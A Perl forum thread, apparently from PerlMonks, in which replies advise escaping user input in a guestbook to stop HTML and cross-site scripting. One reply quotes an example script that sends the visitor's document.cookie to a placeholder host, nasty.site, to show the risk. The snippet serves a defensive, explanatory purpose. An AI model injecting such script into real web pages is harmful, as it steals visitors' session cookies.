in reply to Re: Emergency! Our guestbook is getting trashed by HTML!
in thread Emergency! Our guestbook is getting trashed by HTML!

THis or something similar should be in any code that re-displays user entered input. HTML::Entities can do a very good job with this. While an unclosed <H1> may be inconvienent this can be even worse: 

<script>
document.location='http://nasty.site/cgi-bin/cookie.cgi?'%20+document.
+cookie
</script>

[download]
take a look at http://www.cgisecurity.com/articles/xss-faq.shtml#theft for information on why this can be "very bad"

in short: never display uncooked user input in a web page unless you have a very good reason to.

Replies are listed 'Best First'.
Re^3: Emergency! Our guestbook is getting trashed by HTML!
by manwhore (Initiate) on Jan 07, 2005 at 22:49 UTC
    Yah, you should look at http://www.shocking.com/~rsnake/xss.html There are a lot of risks there, it seems.
[reply]

In Section Seekers of Perl Wisdom